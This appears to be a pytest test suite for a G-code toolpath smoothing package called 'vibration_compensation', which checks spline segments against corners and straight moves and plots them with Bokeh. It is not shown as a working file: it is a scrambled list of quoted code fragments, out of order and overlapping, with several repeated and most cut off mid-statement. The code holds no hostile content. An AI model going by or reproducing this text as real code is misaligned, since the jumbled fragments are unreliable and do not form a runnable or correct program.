"X50 Y50\", \"G1 X100 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 2 straight_segment(data, l=0,",
"- linea) * 0.5 + linea return np.linalg.norm(point - mid) class SegmentChecker(object): def",
"- lineb) def point_on_middle_of_line(linea, lineb, point): mid = (lineb - linea) * 0.5",
"segment is not on the middle of the line\" def check_end_point_middle(self): assert point_on_middle_of_line(self.start_point,",
"from numpy.testing import * import numpy as np import scipy as sp import",
"1.0) def check_point_on_middle_of_line(self): msg = \"The middle point of the spline segment is",
"test_three_short_lines(plotter): data = generate_curves([ \"G1 X10 Y0\", \"G1 X20 Y0.1\", \"G1 X30 Y0.3\"",
"Data): p = plt.Figure( plot_width=1000, plot_height=1000, x_range=(-250, 250), y_range=(-250, 250), match_aspect=True, lod_threshold=None, title=request.node.name",
"import read_gcode, Data import pytest from numpy.testing import * import numpy as np",
"not match\" if line <= 1.0: line_dist = self.start_line_dist + self.line_length * line",
"self.end_point, self.spline(self.spline_start)) == pytest.approx(0, abs=1e-3), msg self.check_distance(self.spline_start, 0.5) def check_line_start_point_end(self): msg = \"The",
"spline segment is not on the line\" assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_start)) == \\",
"the line\" assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_start)) == \\ pytest.approx(0, abs=1e-12), msg def check_line_start_point_middle(self):",
"is not on the line\" assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg",
"check_distances(data) plotter(data) def test_obtuse_corner_with_short_lines(plotter): data = generate_curves([ \"G1 X10 Y0\", \"G1 X20 Y0.1\"",
"= (lineb - linea) * 0.5 + linea return np.linalg.norm(point - mid) class",
"= generate_curves([ \"G1 X100 Y0\", \"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] ==",
"start, end, False) if start == \"start\": checker.check_start_point_start() elif start == \"on\": checker.check_start_point_on()",
"1 straight_segment(data, l=0, s=0, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) ==\\ pytest.approx(np.linalg.norm([100, 200])) check_distances(data) plotter(data)",
"end == \"middle\": checker.check_corner_end_point_middle() else: assert False, \"Invalid end type\" checker.check_continuity() def check_distances(data):",
"self.spline_mid = l + 1.0 self.spline_end = data.smoothed_toolpath.segment_end[s] else: self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_end",
"line_color=\"red\", line_dash=\"dotted\" ) ts = data.smoothed_toolpath.fixed_curvature_speeds(0, data.smoothed_toolpath.start_xy.shape[0], 0.1) points = data.smoothed_toolpath(ts) p.line( points[:,0],",
"start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 200.0 assert np.sum(data.smoothed_toolpath.segment_lengths) == pytest.approx(200, abs=0.1) check_distances(data) plotter(data)",
"s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 +",
"exist_ok=True) plt.output_file(os.path.join(path, os.path.splitext(filename)[0] + \".html\")) ret = [] yield ret plt.save(ret) def generate_curves(gcode,",
"== \\ pytest.approx(10 + np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_shorter_and_longer_line(plotter): data =",
"3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"middle\") straight_segment(data, l=1,",
"test_straight_line(plotter): data = generate_curves([ \"G1 X100 Y200\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 1",
"as np import scipy as sp import vibration_compensation.bokeh_imports as plt @pytest.fixture(scope=\"module\") def figures():",
"data = read_gcode(gcode, maximum_error) return data @pytest.fixture(scope=\"function\") def plotter(figures, request): def plot(data: Data):",
"the spline segment does not match the line end point\" assert_array_almost_equal(self.spline(self.spline_end), self.end_point), msg",
"= (self.spline_start + self.spline_end) / 2.0 xy_lengths = np.linalg.norm(data.end_xy - data.start_xy, axis=1) self.start_line_dist",
"], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0,",
"= generate_curves([ \"G1 X100 Y0\", \"G1 X0 Y1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] ==",
"= generate_curves([ \"G1 X-100 Y-100\", \"G1 X-200 Y-100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] ==",
"assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\",",
"os.path.split(os.path.realpath(__file__)) path = os.path.join(path, \"output\") os.makedirs(path, exist_ok=True) plt.output_file(os.path.join(path, os.path.splitext(filename)[0] + \".html\")) ret =",
"on the end of the line\" assert_array_almost_equal(self.spline(self.spline_start), self.end_point, err_msg=msg) self.check_distance(self.spline_start, 1.0) def check_point_on_middle_of_line(self):",
"match the line end point\" assert_array_almost_equal(self.spline(self.spline_end), self.end_point), msg self.check_distance(self.spline_end, 1.0) end_error_segment = \"The",
"pytest.approx(0, abs=1e-12), msg def check_end_point_end(self): msg = \"The end point of the spline",
"end type\" checker.check_continuity() def corner_segment(data, l, s, start, end): checker = SegmentChecker(data, l,",
"checker.check_line_start_point_middle() else: assert False, \"Invalid start type\" if start == \"middle\" or end",
"corner_segment(data, l=0, s=1, start=\"middle\", end=\"middle\") # Note that this line is very short",
"- point) + np.linalg.norm(lineb - point)\\ - np.linalg.norm(linea - lineb) def point_on_middle_of_line(linea, lineb,",
"= os.path.join(path, \"output\") os.makedirs(path, exist_ok=True) plt.output_file(os.path.join(path, os.path.splitext(filename)[0] + \".html\")) ret = [] yield",
"data = generate_curves([ \"G1 X10 Y0\", \"G1 X30 Y0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0]",
"end distance and the current segment start do not match up\" def check_corner_spline_order(self):",
"0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data) plotter(data) def",
"self.line_length * line else: line_dist = self.start_next_line_dist + self.next_line_length * (line-1.0) assert self.spline.distance(spline)",
"def check_line_start_point_end(self): msg = \"The start point of the spline segment is not",
"\"G1 Z10\", \"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0,",
"start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"middle\") straight_segment(data, l=1, s=2, start=\"middle\", end=\"end\") assert",
"self.line_length self.next_line_length = xy_lengths[l+1] def check_distance(self, spline, line): msg = \"The spline start",
"check_distances(data) plotter(data) def test_two_straight_lines(plotter): data = generate_curves([ \"G1 X50 Y50\", \"G1 X100 Y100\"",
"abs=0.1) check_distances(data) plotter(data) def test_135_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X200",
"\\ pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_135_corner_counter_clockwise(plotter): data = generate_curves([",
"= \"The middle point of the spline segment is not on the line\"",
"type\" if start == \"start\" and end == \"end\": checker.check_point_on_middle_of_line() else: checker.check_point_on_line() if",
"if self.s > 0: prev_end = self.data.smoothed_toolpath.segment_end[self.s-1] assert prev_end == self.spline_start, \\ \"The",
"\"on\": checker.check_end_point_on() elif end == \"middle\": checker.check_end_point_middle() else: assert False, \"Invalid end type\"",
"def check_start_point_start(self): msg = \"The start point of the spline segment does not",
"np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_shorter_and_longer_line(plotter): data = generate_curves([ \"G1 X10 Y0\",",
"checker.check_end_point_middle() else: assert False, \"Invalid end type\" checker.check_continuity() def corner_segment(data, l, s, start,",
"pytest.approx(0, abs=1e-12), SegmentChecker.end_error_segment def check_corner_end_point_on(self): assert point_on_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-12),\\ SegmentChecker.end_error_segment",
"plotter(data) def test_three_short_lines(plotter): data = generate_curves([ \"G1 X10 Y0\", \"G1 X20 Y0.1\", \"G1",
"path = os.path.join(path, \"output\") os.makedirs(path, exist_ok=True) plt.output_file(os.path.join(path, os.path.splitext(filename)[0] + \".html\")) ret = []",
"msg = \"The middle point of the spline segment is not on the",
"s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"on\")",
"checker.check_start_point_start() elif start == \"on\": checker.check_start_point_on() elif start == \"middle\": checker.check_line_start_point_middle() elif start",
"> self.spline_mid, \\ \"The endpoint of the corner spline is before the line",
"def test_obtuse_corner_with_longer_and_shorter_line(plotter): data = generate_curves([ \"G1 X20 Y0\", \"G1 X30 Y-0.1\" ], maximum_error=0.01)",
"+ np.linalg.norm([100, 1]), abs=0.1) check_distances(data) plotter(data) def test_135_corner(plotter): data = generate_curves([ \"G1 X100",
"< 10 + np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([10, 0.1]),",
"plot_height=1000, x_range=(-250, 250), y_range=(-250, 250), match_aspect=True, lod_threshold=None, title=request.node.name ) p.segment( x0=data.start_xy[:, 0], x1=data.end_xy[:,",
"pytest.approx(200, abs=0.1) check_distances(data) plotter(data) def test_45_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1",
"\".html\")) ret = [] yield ret plt.save(ret) def generate_curves(gcode, maximum_error): data = read_gcode(gcode,",
"+ self.line_length self.next_line_length = xy_lengths[l+1] def check_distance(self, spline, line): msg = \"The spline",
"start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100,",
"+ np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data)",
"+ np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]), abs=0.1) check_distances(data) plotter(data) def test_three_long_lines_with_z_move(plotter): data =",
"the line\" assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg self.check_distance(self.spline_mid, 0.5) def",
"= \"The end point of the spline segment is not on the middle",
"X100 Y200\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 1 straight_segment(data, l=0, s=0, start=\"start\", end=\"end\")",
"from vibration_compensation import read_gcode, Data import pytest from numpy.testing import * import numpy",
"corner_segment(data, l=0, s=1, start=\"middle\", end=\"middle\") straight_segment(data, l=1, s=2, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) <",
"data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"on\")",
"pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 1.5) def check_continuity(self): msg = \"There's a discontinuity at",
"+ self.next_line_length * (line-1.0) assert self.spline.distance(spline) <= line_dist and \\ self.spline.distance(spline) == pytest.approx(line_dist,",
"if l < data.start_xy.shape[0] - 1: self.start_next_line_dist = self.start_line_dist + self.line_length self.next_line_length =",
"l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 200.0",
"check_distances(data) plotter(data) def test_45_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X0 Y100\"",
"assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 +",
"def generate_curves(gcode, maximum_error): data = read_gcode(gcode, maximum_error) return data @pytest.fixture(scope=\"function\") def plotter(figures, request):",
"+ np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_three_long_lines(plotter): data = generate_curves([ \"G1 X100",
"= start self.end = end self.start_point = data.start_xy[l] self.end_point = data.end_xy[l] if l",
"pytest.approx(10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]), abs=0.1) check_distances(data) plotter(data) def test_three_long_lines_with_z_move(plotter): data",
"assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(300, abs=0.1) check_distances(data) plotter(data) def test_three_short_lines(plotter): data = generate_curves([",
"import os from vibration_compensation import read_gcode, Data import pytest from numpy.testing import *",
"start=\"middle\", end=\"middle\") # Note that this line is very short straight_segment(data, l=1, s=2,",
"data.smoothed_toolpath.segment_start.shape[0] == 1 straight_segment(data, l=0, s=0, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) ==\\ pytest.approx(np.linalg.norm([100, 200]))",
"pytest.approx(100 + np.linalg.norm([100, 1]), abs=0.1) check_distances(data) plotter(data) def test_135_corner(plotter): data = generate_curves([ \"G1",
"l=0, s=1, start=\"on\", end=\"middle\") straight_segment(data, l=1, s=2, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 20",
"line_dist and \\ self.spline.distance(spline) == pytest.approx(line_dist, abs=0.1), \\ msg def check_start_point_start(self): msg =",
"msg = \"The start point of the spline segment is not on the",
"self.spline.distance(self.spline_start) and \\ self.spline.distance(self.spline_start-1e-12) == \\ pytest.approx(self.spline.distance(self.spline_start), abs=0.001), \\ \"The previous segment end",
"0.1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_shorter_and_longer_line(plotter): data = generate_curves([ \"G1 X10 Y0\", \"G1",
"1.0) def straight_segment(data, l, s, start, end): checker = SegmentChecker(data, l, s, start,",
"assert np.sum(data.smoothed_toolpath.segment_lengths) <\\ 10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]) assert np.sum(data.smoothed_toolpath.segment_lengths) ==",
"\"middle\" or end == \"middle\": checker.check_corner_middle_normal() else: checker.check_corner_middle_short() if end == \"on\": checker.check_corner_end_point_on()",
"np.sum(data.smoothed_toolpath.segment_lengths) < 20 + np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(20 + np.linalg.norm([10,",
"the line\" assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg def check_end_point_end(self): msg",
"generate_curves([ \"G1 X100 Y200\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 1 straight_segment(data, l=0, s=0,",
"check_distances(data): t = data.smoothed_toolpath.fixed_distances(0, data.smoothed_toolpath.total_distance(), 10) assert_array_almost_equal(data.smoothed_toolpath.distance(t), np.linspace(0, data.smoothed_toolpath.total_distance(), 10)) def test_straight_line(plotter): data",
"False) if start == \"start\": checker.check_start_point_start() elif start == \"on\": checker.check_start_point_on() elif start",
"check_distances(data) plotter(data) def test_obtuse_corner_with_shorter_and_longer_line(plotter): data = generate_curves([ \"G1 X10 Y0\", \"G1 X30 Y0.1\"",
"abs=0.1) check_distances(data) plotter(data) def test_three_short_lines(plotter): data = generate_curves([ \"G1 X10 Y0\", \"G1 X20",
"of the spline segment does not match the line end point\" assert_array_almost_equal(self.spline(self.spline_end), self.end_point),",
"else: self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_end = data.smoothed_toolpath.segment_end[s] self.spline_mid = (self.spline_start + self.spline_end) /",
"0.5) def check_corner_end_point_middle(self): assert point_on_middle_of_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 1.5)",
"generate_curves([ \"G1 X10 Y0\", \"G1 X30 Y0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3",
"self.end_point, self.spline(self.spline_start)) == \\ pytest.approx(0, abs=1e-12), msg def check_line_start_point_middle(self): msg = \"The start",
"end=\"end\") straight_segment(data, l=1, s=3, start=\"end\", end=\"end\") straight_segment(data, l=3, s=4, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths)",
"and \\ self.spline.distance(self.spline_start-1e-12) == \\ pytest.approx(self.spline.distance(self.spline_start), abs=0.001), \\ \"The previous segment end distance",
"= \"The start point of the spline segment does not match the line",
"start == \"on\": checker.check_start_point_on() elif start == \"middle\": checker.check_line_start_point_middle() else: assert False, \"Invalid",
"Data import pytest from numpy.testing import * import numpy as np import scipy",
"s=0, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) ==\\ pytest.approx(np.linalg.norm([100, 200])) check_distances(data) plotter(data) def test_two_straight_lines(plotter): data",
"test_two_straight_lines(plotter): data = generate_curves([ \"G1 X50 Y50\", \"G1 X100 Y100\" ], maximum_error=0.01) assert",
"X20 Y0.1\", \"G1 X30 Y0.3\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0,",
"200])) check_distances(data) plotter(data) def test_two_straight_lines(plotter): data = generate_curves([ \"G1 X50 Y50\", \"G1 X100",
"+ np.linalg.norm(lineb - point)\\ - np.linalg.norm(linea - lineb) def point_on_middle_of_line(linea, lineb, point): mid",
"plotter(data) def test_135_corner_counter_clockwise(plotter): data = generate_curves([ \"G1 X-100 Y-100\", \"G1 X-200 Y-100\" ],",
"lineb, point): mid = (lineb - linea) * 0.5 + linea return np.linalg.norm(point",
"np.sum(data.smoothed_toolpath.segment_lengths) < 300 assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(300, abs=0.1) check_distances(data) plotter(data) def test_three_short_lines(plotter):",
"l, s, start, end, corner): self.data = data self.s = s self.start =",
"50]) + np.linalg.norm([50, 50]) ) check_distances(data) plotter(data) def test_90_corner(plotter): data = generate_curves([ \"G1",
"start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") straight_segment(data, l=1, s=3, start=\"end\", end=\"end\") straight_segment(data,",
"plotter(data) def test_90_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\" ],",
"np.linspace(0, data.smoothed_toolpath.total_distance(), 10)) def test_straight_line(plotter): data = generate_curves([ \"G1 X100 Y200\" ], maximum_error=0.01)",
"> 0: prev_end = self.data.smoothed_toolpath.segment_end[self.s-1] assert prev_end == self.spline_start, \\ \"The previous segment",
"straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") straight_segment(data, l=1, s=3, start=\"end\", end=\"end\") straight_segment(data, l=3, s=4,",
"data.smoothed_toolpath.segment_end[s] else: self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_end = data.smoothed_toolpath.segment_end[s] self.spline_mid = (self.spline_start + self.spline_end)",
"100 + np.linalg.norm([100, 100]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1)",
"= generate_curves([ \"G1 X20 Y0\", \"G1 X30 Y-0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] ==",
"== \"middle\": checker.check_line_start_point_middle() else: assert False, \"Invalid start type\" if start == \"middle\"",
"elif end == \"middle\": checker.check_corner_end_point_middle() else: assert False, \"Invalid end type\" checker.check_continuity() def",
"data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"middle\")",
"\"The start point of the spline segment is not on the middle of",
"== \\ pytest.approx(300, abs=0.1) check_distances(data) plotter(data) def test_three_short_lines(plotter): data = generate_curves([ \"G1 X10",
"check_distances(data) plotter(data) def test_very_acute_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X0 Y1\"",
"end point of the spline segment is not on the middle of the",
"else: assert False, \"Invalid start type\" if start == \"middle\" or end ==",
"elif end == \"middle\": checker.check_end_point_middle() else: assert False, \"Invalid end type\" checker.check_continuity() def",
"point_on_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-12),\\ SegmentChecker.end_error_segment end_error_segment_middle = \"The end point of",
"data.smoothed_toolpath if corner: self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_mid = l + 1.0 self.spline_end =",
"the middle of the line\" assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg",
"self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 1.5) def check_continuity(self): msg = \"There's a",
"straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1,",
"def check_distances(data): t = data.smoothed_toolpath.fixed_distances(0, data.smoothed_toolpath.total_distance(), 10) assert_array_almost_equal(data.smoothed_toolpath.distance(t), np.linspace(0, data.smoothed_toolpath.total_distance(), 10)) def test_straight_line(plotter):",
"not close enough\" def check_corner_middle_normal(self): assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) <= 0.01,\\ SegmentChecker.corner_error self.check_distance(self.spline_mid,",
"middle of the line\" def check_end_point_middle(self): assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\",
"\"G1 X100 Y0\", \"G1 X100 Y100\", \"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0]",
"point)\\ - np.linalg.norm(linea - lineb) def point_on_middle_of_line(linea, lineb, point): mid = (lineb -",
"assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_135_corner_counter_clockwise(plotter):",
"def point_on_line(linea, lineb, point): return np.linalg.norm(linea - point) + np.linalg.norm(lineb - point)\\ -",
"start point\" assert_array_almost_equal(self.spline(self.spline_start), self.start_point, err_msg=msg) self.check_distance(self.spline_start, 0) def check_start_point_on(self): msg = \"The start",
"assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\",",
"the spline segment is not on the line\" def check_end_point_on(self): assert point_on_line(self.start_point, self.end_point,",
"== \\ pytest.approx(100 + np.linalg.norm([100, 1]), abs=0.1) check_distances(data) plotter(data) def test_135_corner(plotter): data =",
"== 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"on\") straight_segment(data,",
"pytest.approx(0.01, abs=1e-12), \\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def straight_segment(data, l, s, start, end): checker",
"import numpy as np import scipy as sp import vibration_compensation.bokeh_imports as plt @pytest.fixture(scope=\"module\")",
"end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"middle\") # Note that this line is very",
"else: checker.check_point_on_line() if end == \"end\": checker.check_end_point_end() elif end == \"on\": checker.check_end_point_on() elif",
"= \"The spline start distance does not match\" if line <= 1.0: line_dist",
"xy_lengths = np.linalg.norm(data.end_xy - data.start_xy, axis=1) self.start_line_dist = np.sum(xy_lengths[:l]) self.line_length = xy_lengths[l] if",
"data = generate_curves([ \"G1 X100 Y0\", \"G1 X0 Y1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0]",
"self.spline_end = data.smoothed_toolpath.segment_end[s] else: self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_end = data.smoothed_toolpath.segment_end[s] self.spline_mid = (self.spline_start",
"self.check_distance(self.spline_mid, 1.0) def straight_segment(data, l, s, start, end): checker = SegmentChecker(data, l, s,",
"Y0\", \"G1 X100 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0,",
"abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_longer_and_shorter_line(plotter): data = generate_curves([ \"G1 X20 Y0\", \"G1 X30",
"\"G1 X200 Y1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\",",
"l=0, s=1, start=\"middle\", end=\"middle\") # Note that this line is very short straight_segment(data,",
"- self.spline(self.spline_mid)) ==\\ pytest.approx(0.01, abs=1e-12), \\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def straight_segment(data, l, s,",
"pytest.approx(0, abs=1e-12), msg self.check_distance(self.spline_mid, 0.5) def check_point_on_line(self): msg = \"The middle point of",
"s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"on\") corner_segment(data, l=1, s=3, start=\"on\", end=\"on\")",
"y0=data.start_xy[:, 1], y1=data.end_xy[:, 1], line_width=1, line_color=\"red\", line_dash=\"dotted\" ) ts = data.smoothed_toolpath.fixed_curvature_speeds(0, data.smoothed_toolpath.start_xy.shape[0], 0.1)",
"s=0, start=\"start\", end=\"end\") straight_segment(data, l=1, s=1, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(",
"s, start, end): checker = SegmentChecker(data, l, s, start, end, True) checker.check_corner_spline_order() if",
"self.spline(self.spline_start)) == pytest.approx(0, abs=1e-3), msg self.check_distance(self.spline_start, 0.5) def check_line_start_point_end(self): msg = \"The start",
"fill_color=\"white\" ) figures.append(p) return plot def point_on_line(linea, lineb, point): return np.linalg.norm(linea - point)",
"pytest.approx(20 + np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_three_long_lines(plotter): data = generate_curves([ \"G1",
"\"G1 X100 Y0\", \"G1 X200 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data,",
"start, end, corner): self.data = data self.s = s self.start = start self.end",
"= self.start_line_dist + self.line_length * line else: line_dist = self.start_next_line_dist + self.next_line_length *",
"check_distances(data) plotter(data) def test_135_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X200 Y100\"",
"not on the line\" def check_end_point_on(self): assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_end)) == \\ pytest.approx(0,",
"assert False, \"Invalid start type\" if start == \"middle\" or end == \"middle\":",
"Y0\", \"G1 X20 Y0.1\", \"G1 X30 Y0.3\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5",
"the line\" def check_end_point_middle(self): assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end,",
"of the line\" assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_start)) == pytest.approx(0, abs=1e-3), msg self.check_distance(self.spline_start, 0.5)",
"checker = SegmentChecker(data, l, s, start, end, False) if start == \"start\": checker.check_start_point_start()",
"request): def plot(data: Data): p = plt.Figure( plot_width=1000, plot_height=1000, x_range=(-250, 250), y_range=(-250, 250),",
"check_distances(data) plotter(data) def test_three_short_lines(plotter): data = generate_curves([ \"G1 X10 Y0\", \"G1 X20 Y0.1\",",
"abs=0.1) check_distances(data) plotter(data) def test_very_obtuse_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X200",
"middle of the line\" assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg self.check_distance(self.spline_mid,",
"plotter(data) def test_45_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X0 Y100\" ],",
"], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0,",
"plot_width=1000, plot_height=1000, x_range=(-250, 250), y_range=(-250, 250), match_aspect=True, lod_threshold=None, title=request.node.name ) p.segment( x0=data.start_xy[:, 0],",
"check_point_on_middle_of_line(self): msg = \"The middle point of the spline segment is not on",
"class SegmentChecker(object): def __init__(self,data, l, s, start, end, corner): self.data = data self.s",
"= np.linalg.norm(data.end_xy - data.start_xy, axis=1) self.start_line_dist = np.sum(xy_lengths[:l]) self.line_length = xy_lengths[l] if l",
"], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") straight_segment(data, l=0,",
"end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") straight_segment(data, l=1,",
"= os.path.split(os.path.realpath(__file__)) path = os.path.join(path, \"output\") os.makedirs(path, exist_ok=True) plt.output_file(os.path.join(path, os.path.splitext(filename)[0] + \".html\")) ret",
"assert_array_almost_equal(data.smoothed_toolpath.distance(t), np.linspace(0, data.smoothed_toolpath.total_distance(), 10)) def test_straight_line(plotter): data = generate_curves([ \"G1 X100 Y200\" ],",
"\"G1 X30 Y0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\",",
"np.sum(data.smoothed_toolpath.segment_lengths) < 200.0 assert np.sum(data.smoothed_toolpath.segment_lengths) == pytest.approx(200, abs=0.1) check_distances(data) plotter(data) def test_45_corner(plotter): data",
